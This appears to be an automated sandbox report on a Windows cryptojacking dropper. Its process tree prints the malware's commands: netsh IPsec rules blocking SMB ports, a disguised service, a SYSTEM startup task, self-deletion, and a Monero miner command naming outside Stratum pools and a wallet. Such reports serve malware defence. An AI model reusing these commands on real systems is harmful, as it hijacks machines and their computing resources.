Analysis
-
max time kernel
151s -
max time network
140s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
30-06-2020 12:05
Static task
static1
Behavioral task
behavioral1
Sample
618a1e3551560b86454450f3ea580029.exe
Resource
win7v200430
Behavioral task
behavioral2
Sample
618a1e3551560b86454450f3ea580029.exe
Resource
win10
General
-
Target
618a1e3551560b86454450f3ea580029.exe
-
Size
584KB
-
MD5
618a1e3551560b86454450f3ea580029
-
SHA1
39d86228750d1eebdb78f60b03c3b638acf72d34
-
SHA256
6edb794a9f28cbd60dcb9fefc0e145f64c9e623b3df235a4a907ca948fd1edb9
-
SHA512
d5b309a0ff9b07e74c9cee1df37a627193393de7cc0fe079ab606d94b2beac948c8d7d25378de3cf87b00c7227c70fa8e49291d6060a7254e2ce0439a09c2305
Malware Config
Signatures
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
66545a.exetqnkhe.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Wine 66545a.exe Key opened \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Wine tqnkhe.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
618a1e3551560b86454450f3ea580029.exe66545a.exetqnkhe.exepid process 1520 618a1e3551560b86454450f3ea580029.exe 1520 618a1e3551560b86454450f3ea580029.exe 664 66545a.exe 664 66545a.exe 1564 tqnkhe.exe 1564 tqnkhe.exe -
Loads dropped DLL 6 IoCs
Processes:
618a1e3551560b86454450f3ea580029.exe66545a.exetqnkhe.exepid process 1520 618a1e3551560b86454450f3ea580029.exe 1520 618a1e3551560b86454450f3ea580029.exe 664 66545a.exe 664 66545a.exe 1564 tqnkhe.exe 1808 -
Executes dropped EXE 3 IoCs
Processes:
66545a.exetqnkhe.exeJs.exepid process 664 66545a.exe 1564 tqnkhe.exe 1116 Js.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 528 cmd.exe -
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
66545a.exetqnkhe.exepid process 664 66545a.exe 1564 tqnkhe.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Js.exedescription pid process Token: SeLockMemoryPrivilege 1116 Js.exe Token: SeLockMemoryPrivilege 1116 Js.exe -
Modifies WinLogon for persistence 2 TTPs 2 IoCs
Processes:
66545a.exetqnkhe.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe " 66545a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\cZDUg\\tqnkhe.exe" tqnkhe.exe -
Creates new service(s) 1 TTPs
-
Modifies service 2 TTPs 152 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\IPSec\OperationMode = "3" netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig netsh.exe -
Suspicious use of WriteProcessMemory 168 IoCs
Processes:
618a1e3551560b86454450f3ea580029.exe66545a.exetqnkhe.execmd.exedescription pid process target process PID 1520 wrote to memory of 664 1520 618a1e3551560b86454450f3ea580029.exe 66545a.exe PID 1520 wrote to memory of 664 1520 618a1e3551560b86454450f3ea580029.exe 66545a.exe PID 1520 wrote to memory of 664 1520 618a1e3551560b86454450f3ea580029.exe 66545a.exe PID 1520 wrote to memory of 664 1520 618a1e3551560b86454450f3ea580029.exe 66545a.exe PID 1520 wrote to memory of 528 1520 618a1e3551560b86454450f3ea580029.exe cmd.exe PID 1520 wrote to memory of 528 1520 618a1e3551560b86454450f3ea580029.exe cmd.exe PID 1520 wrote to memory of 528 1520 618a1e3551560b86454450f3ea580029.exe cmd.exe PID 1520 wrote to memory of 528 1520 618a1e3551560b86454450f3ea580029.exe cmd.exe PID 664 wrote to memory of 1564 664 66545a.exe tqnkhe.exe PID 664 wrote to memory of 1564 664 66545a.exe tqnkhe.exe PID 664 wrote to memory of 1564 664 66545a.exe tqnkhe.exe PID 664 wrote to memory of 1564 664 66545a.exe tqnkhe.exe PID 664 wrote to memory of 1916 664 66545a.exe cmd.exe PID 664 wrote to memory of 1916 664 66545a.exe cmd.exe PID 664 wrote to memory of 1916 664 66545a.exe cmd.exe PID 664 wrote to memory of 1916 664 66545a.exe cmd.exe PID 1564 wrote to memory of 1504 1564 tqnkhe.exe cmd.exe PID 1564 wrote to memory of 1504 1564 tqnkhe.exe cmd.exe PID 1564 wrote to memory of 1504 1564 tqnkhe.exe cmd.exe PID 1564 wrote to memory of 1504 1564 tqnkhe.exe cmd.exe PID 1504 wrote to memory of 924 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 924 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 924 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 924 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1840 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1840 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1840 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1840 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1752 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1752 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1752 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1752 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1804 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1804 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1804 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1804 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1520 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1520 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1520 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1520 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 832 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 832 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 832 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 832 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1960 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1960 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1960 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1960 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 300 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 300 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 300 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 300 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1588 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1588 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1588 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 1588 1504 cmd.exe netsh.exe PID 1564 wrote to memory of 692 1564 tqnkhe.exe cmd.exe PID 1564 wrote to memory of 692 1564 tqnkhe.exe cmd.exe PID 1564 wrote to memory of 692 1564 tqnkhe.exe cmd.exe PID 1564 wrote to memory of 692 1564 tqnkhe.exe cmd.exe PID 1504 wrote to memory of 984 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 984 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 984 1504 cmd.exe netsh.exe PID 1504 wrote to memory of 984 1504 cmd.exe netsh.exe -
Suspicious behavior: EnumeratesProcesses 47 IoCs
Processes:
618a1e3551560b86454450f3ea580029.exe66545a.exetqnkhe.exepid process 1520 618a1e3551560b86454450f3ea580029.exe 1520 618a1e3551560b86454450f3ea580029.exe 1520 618a1e3551560b86454450f3ea580029.exe 1520 618a1e3551560b86454450f3ea580029.exe 664 66545a.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe 1564 tqnkhe.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
66545a.exetqnkhe.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 66545a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ tqnkhe.exe -
Drops file in Windows directory 66 IoCs
Processes:
tqnkhe.exe66545a.exedescription ioc process File created C:\Windows\cZDUg\tibe-1.dll tqnkhe.exe File created C:\Windows\cZDUg\tqnkhe.exe 66545a.exe File created C:\Windows\cZDUg\pcre-0.dll tqnkhe.exe File created C:\Windows\cZDUg\tucl.dll tqnkhe.exe File created C:\Windows\cZDUg\ip.dll tqnkhe.exe File created C:\Windows\cZDUg\exma.dll tqnkhe.exe File created C:\Windows\cZDUg\pcrecpp-0.dll tqnkhe.exe File created C:\Windows\cZDUg\pcreposix-0.dll tqnkhe.exe File created C:\Windows\cZDUg\cnli-1.dll tqnkhe.exe File created C:\Windows\cZDUg\etebCore-2.x86.dll tqnkhe.exe File created C:\Windows\cZDUg\posh-0.dll tqnkhe.exe File created C:\Windows\cZDUg\tibe-2.dll tqnkhe.exe File created C:\Windows\cZDUg\trch.dll tqnkhe.exe File created C:\Windows\cZDUg\trch-1.dll tqnkhe.exe File created C:\Windows\cZDUg\trfo-2.dll tqnkhe.exe File created C:\Windows\cZDUg\TFf tqnkhe.exe File created C:\Windows\cZDUg\tscl.html 66545a.exe File created C:\Windows\cZDUg\etch-0.dll tqnkhe.exe File created C:\Windows\cZDUg\esco-0.dll tqnkhe.exe File created C:\Windows\cZDUg\zibe.dll tqnkhe.exe File created C:\Windows\IME\tps.exe 66545a.exe File created C:\Windows\end.bat tqnkhe.exe File created C:\Windows\cZDUg\coli-0.dll tqnkhe.exe File created C:\Windows\cZDUg\pcla-0.dll tqnkhe.exe File created C:\Windows\cZDUg\trch-0.dll tqnkhe.exe File created C:\Windows\cZDUg\xdvl-0.dll tqnkhe.exe File created C:\Windows\cZDUg\Cstr.xml tqnkhe.exe File created C:\Windows\cZDUg\cnli-0.dll tqnkhe.exe File created C:\Windows\cZDUg\etchCore-0.x86.dll tqnkhe.exe File created C:\Windows\cZDUg\zlib1.dll tqnkhe.exe File created C:\Windows\cZDUg\chrome..fb tqnkhe.exe File created C:\Windows\cZDUg\etchCore-0.x64.dll tqnkhe.exe File created C:\Windows\cZDUg\chrome..xml tqnkhe.exe File created C:\Windows\cZDUg\tibe.dll tqnkhe.exe File created C:\Windows\cZDUg\svchost.exe tqnkhe.exe File opened for modification C:\Windows\end.bat tqnkhe.exe File created C:\Windows\cZDUg\qdx.bat tqnkhe.exe File created C:\Windows\cZDUg\exma-1.dll tqnkhe.exe File created C:\Windows\cZDUg\libeay32.dll tqnkhe.exe File created C:\Windows\cZDUg\libxml2.dll tqnkhe.exe File created C:\Windows\cZDUg\ucl.dll tqnkhe.exe File created C:\Windows\cZDUg\Cstr.exe tqnkhe.exe File created C:\Windows\cZDUg\adfw-2.dll tqnkhe.exe File created C:\Windows\cZDUg\etebCore-2.x64.dll tqnkhe.exe File created C:\Windows\cZDUg\WinRing0x64.sys tqnkhe.exe File created C:\Windows\cZDUg\Js.exe tqnkhe.exe File created C:\Windows\cZDUg\adfw.dll tqnkhe.exe File created C:\Windows\cZDUg\eteb-2.dll tqnkhe.exe File created C:\Windows\cZDUg\dmgd-1.dll tqnkhe.exe File created C:\Windows\cZDUg\dmgd-4.dll tqnkhe.exe File created C:\Windows\cZDUg\tucl-1.dll tqnkhe.exe File created C:\Windows\boy.exe 66545a.exe File created C:\Windows\cZDUg\Cstr.fb tqnkhe.exe File created C:\Windows\cZDUg\s.bat tqnkhe.exe File created C:\Windows\cZDUg\trfo.dll tqnkhe.exe File created C:\Windows\cZDUg\trfo-0.dll tqnkhe.exe File opened for modification C:\Windows\cZDUg\tscl.html tqnkhe.exe File created C:\Windows\cZDUg\libiconv-2.dll tqnkhe.exe File created C:\Windows\cZDUg\riar.dll tqnkhe.exe File created C:\Windows\cZDUg\riar-2.dll tqnkhe.exe File created C:\Windows\cZDUg\chrome..exe tqnkhe.exe File created C:\Windows\cZDUg\crli-0.dll tqnkhe.exe File created C:\Windows\cZDUg\iconv.dll tqnkhe.exe File created C:\Windows\cZDUg\ssleay32.dll tqnkhe.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe"C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\66545a.exe"C:\Users\Admin\AppData\Local\Temp\66545a.exe"2⤵
- Identifies Wine through registry keys
- Suspicious use of SetWindowsHookEx
- Loads dropped DLL
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies WinLogon for persistence
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Windows directory
-
C:\Windows\cZDUg\tqnkhe.exeC:\Windows\cZDUg\tqnkhe.exe3⤵
- Identifies Wine through registry keys
- Suspicious use of SetWindowsHookEx
- Loads dropped DLL
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies WinLogon for persistence
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y5⤵
- Modifies service
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y5⤵
- Modifies service
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt5⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"5⤵
- Modifies service
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y5⤵
- Modifies service
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "4⤵
-
C:\Windows\SysWOW64\sc.exesc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\cZDUg\qdx.bat" "4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\cZDUg\tqnkhe.exe" /SC ONSTART5⤵
- Creates scheduled task(s)
-
C:\Windows\cZDUg\Js.exe"C:\Windows\cZDUg\Js.exe" -o stratum+tcp://rx.monerorx.com:8888 -o stratum+tcp://rx1.monerorx.com:9855 -o ttt.ppxfghdfhdfhfghxmr.com:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\66545a.exe"3⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe"2⤵
- Deletes itself
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\66545a.exe
-
C:\Users\Admin\AppData\Local\Temp\66545a.exe
-
C:\Windows\cZDUg\Js.exe
-
C:\Windows\cZDUg\qdx.bat
-
C:\Windows\cZDUg\tqnkhe.exe
-
C:\Windows\cZDUg\tqnkhe.exe
-
C:\Windows\cZDUg\tscl.html
-
C:\Windows\end.bat
-
C:\Windows\end.bat
-
C:\Windows\end.bat
-
\Users\Admin\AppData\Local\Temp\66545a.exe
-
\Users\Admin\AppData\Local\Temp\66545a.exe
-
\Windows\cZDUg\Js.exe
-
\Windows\cZDUg\Js.exe
-
\Windows\cZDUg\tqnkhe.exe
-
\Windows\cZDUg\tqnkhe.exe
-
memory/300-25-0x0000000000000000-mapping.dmp
-
memory/300-40-0x0000000000000000-mapping.dmp
-
memory/524-51-0x0000000000000000-mapping.dmp
-
memory/524-38-0x0000000000000000-mapping.dmp
-
memory/528-4-0x0000000000000000-mapping.dmp
-
memory/664-5-0x0000000005600000-0x0000000005611000-memory.dmpFilesize
68KB
-
memory/664-2-0x0000000000000000-mapping.dmp
-
memory/664-6-0x0000000005A10000-0x0000000005A21000-memory.dmpFilesize
68KB
-
memory/692-28-0x0000000000000000-mapping.dmp
-
memory/756-36-0x0000000000000000-mapping.dmp
-
memory/832-23-0x0000000000000000-mapping.dmp
-
memory/924-18-0x0000000000000000-mapping.dmp
-
memory/984-29-0x0000000000000000-mapping.dmp
-
memory/1044-44-0x0000000000000000-mapping.dmp
-
memory/1064-48-0x0000000000000000-mapping.dmp
-
memory/1116-33-0x0000000000000000-mapping.dmp
-
memory/1116-59-0x0000000000000000-mapping.dmp
-
memory/1224-37-0x0000000000000000-mapping.dmp
-
memory/1224-49-0x0000000000000000-mapping.dmp
-
memory/1344-39-0x0000000000000000-mapping.dmp
-
memory/1352-32-0x0000000000000000-mapping.dmp
-
memory/1376-43-0x0000000000000000-mapping.dmp
-
memory/1468-30-0x0000000000000000-mapping.dmp
-
memory/1504-16-0x0000000000000000-mapping.dmp
-
memory/1520-22-0x0000000000000000-mapping.dmp
-
memory/1556-56-0x0000000000000000-mapping.dmp
-
memory/1564-14-0x0000000005A00000-0x0000000005A11000-memory.dmpFilesize
68KB
-
